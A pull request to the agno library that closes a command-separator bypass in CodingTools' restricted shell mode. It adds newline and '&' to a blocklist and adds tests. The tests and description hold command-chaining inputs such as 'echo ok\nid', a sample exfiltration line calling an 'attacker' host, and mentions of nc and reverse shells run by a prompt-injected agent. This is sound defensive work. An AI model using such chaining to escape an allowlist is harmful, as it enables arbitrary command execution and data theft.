### PR TITLE
[fix] block command-separator chaining in CodingTools restricted mode

### DIFF
--- a/libs/agno/agno/tools/coding.py
+++ b/libs/agno/agno/tools/coding.py
@@ -247,8 +247,11 @@ class CodingTools(Toolkit):
                 pass
         self._temp_files.clear()
 
-    # Shell operators that enable command chaining or substitution
-    _DANGEROUS_PATTERNS: List[str] = ["&&", "||", ";", "|", "$(", "`", ">", ">>", "<"]
+    # Shell operators that enable command chaining or substitution.
+    # Newlines and a bare "&" are separators too: `shlex.split` flattens them into
+    # ordinary tokens, so without them here a second (non-allowlisted) command after
+    # `\n`/`&` would pass validation yet still run under `shell=True`.
+    _DANGEROUS_PATTERNS: List[str] = ["&&", "||", ";", "|", "&", "\n", "\r", "$(", "`", ">", ">>", "<"]
 
     def _check_command(self, command: str) -> Optional[str]:
         """Check if a shell command is safe to execute.

--- a/libs/agno/tests/unit/tools/test_coding_tools.py
+++ b/libs/agno/tests/unit/tools/test_coding_tools.py
@@ -808,3 +808,38 @@ def test_instructions_preamble_lists_enabled_tools():
         assert "edit_file" not in first_line
         assert "write_file" not in first_line
         assert "run_shell" not in first_line
+
+
+# --- restricted-mode command-separator hardening ---
+
+
+def test_check_command_blocks_newline_chaining():
+    """A second command chained after a newline must be rejected in restricted mode."""
+    with tempfile.TemporaryDirectory() as tmp_dir:
+        tools = CodingTools(base_dir=Path(tmp_dir))  # restrict_to_base_dir=True, allowlist on
+        # `id` is not in the allowlist; without \n in the blocklist this passed validation.
+        assert tools._check_command("echo ok\nid") is not None
+
+
+def test_check_command_blocks_ampersand_chaining():
+    """A command chained/backgrounded via a bare '&' must be rejected."""
+    with tempfile.TemporaryDirectory() as tmp_dir:
+        tools = CodingTools(base_dir=Path(tmp_dir))
+        assert tools._check_command("echo ok & id") is not None
+
+
+def test_check_command_allows_plain_allowlisted_command():
+    """A plain allowlisted command with no separators still passes."""
+    with tempfile.TemporaryDirectory() as tmp_dir:
+        tools = CodingTools(base_dir=Path(tmp_dir))
+        assert tools._check_command("echo hello") is None
+
+
+def test_run_shell_does_not_execute_command_after_newline():
+    """End-to-end: run_shell must not execute an unlisted command chained via newline."""
+    with tempfile.TemporaryDirectory() as tmp_dir:
+        tools = CodingTools(base_dir=Path(tmp_dir))
+        result = tools.run_shell("echo ok\nid")
+        # Rejected before execution — the chained command never runs.
+        assert "not allowed" in result
+        assert "uid=" not in result


### PR DESCRIPTION
## Summary

`CodingTools` runs by default with `restrict_to_base_dir=True` and a default `allowed_commands` allowlist. In that mode `run_shell` is registered **without** `requires_confirmation`, so `_check_command` is the only gate before the command runs under `subprocess.run(command, shell=True, ...)`.

`_check_command` blocks shell operators via `_DANGEROUS_PATTERNS` and validates only the **first** `shlex.split` token against the allowlist. The list omits the newline (`\n`/`\r`) and a bare `&`. `shlex.split` flattens those into ordinary tokens, so a second, non-allowlisted command chained after them passes validation but still executes under `shell=True`:

```python
_DANGEROUS_PATTERNS = ["&&", "||", ";", "|", "$(", "`", ">", ">>", "<"]   # no "\n", "\r", "&"
```

```python
tools = CodingTools(base_dir=".")           # restricted, allowlist on (defaults)
tools.run_shell("echo ok\nid")              # `id` is NOT allowlisted — but runs
tools.run_shell("echo ok & id")             # same, via background operator
```

Verified end-to-end: the second command executes (`uid=...` returned), while the documented `;`/`|`/path-escape cases are correctly blocked.

## Impact

The restricted-mode guarantees — "only allowlisted commands run", "shell operations cannot escape base_dir" — are both false. An agent influenced by prompt-injected content can run arbitrary non-allowlisted binaries: `echo ok\ncurl http://attacker/$(...)` (exfil/SSRF), `nc`, a reverse shell, etc. Unlike the interpreter-flag path, this needs no allowlisted interpreter at all.

## Fix

Add `&`, `\n`, `\r` to `_DANGEROUS_PATTERNS`. Zero behavior change for legitimate single commands (they contain no newline or `&`); the demonstrated chaining is now rejected before execution.

A stronger follow-up would be to drop `shell=True` in restricted mode and run the already-parsed `shlex.split(command)` argv, making the allowlist + path checks authoritative — happy to do that instead if preferred, but this is the minimal, targeted close.

## Relationship to open PRs

Orthogonal to **#7102** and **#8468**, which harden the *same* `_check_command` against allowlisted-interpreter flag / inline-code execution (`python -c "..."`). Neither modifies the separator blocklist, so this command-separator bypass survives both. Kept intentionally minimal to ease landing alongside them.

## Tests

`libs/agno/tests/unit/tools/test_coding_tools.py` — added: newline chaining rejected, `&` chaining rejected, plain allowlisted command still passes, and an end-to-end `run_shell` test asserting the chained command does not execute.

```
56 passed
ruff format --check: 2 files already formatted
ruff check: All checks passed!
```

## Type of change

- [x] Bug fix (security / defense-in-depth)

## Checklist

- [x] `ruff format` / `ruff check` clean
- [x] Self-review completed
- [x] Tests added and passing

### Duplicate PR Check

- [x] Searched open PRs. #7102 and #8468 touch the same function but a different bypass (interpreter flags / inline code); this closes command-separator chaining, which neither addresses.

### AI disclosure

Prepared with AI assistance (Claude Code); the author reviewed the change and verified the bypass executes on current `main` and is blocked after the fix.
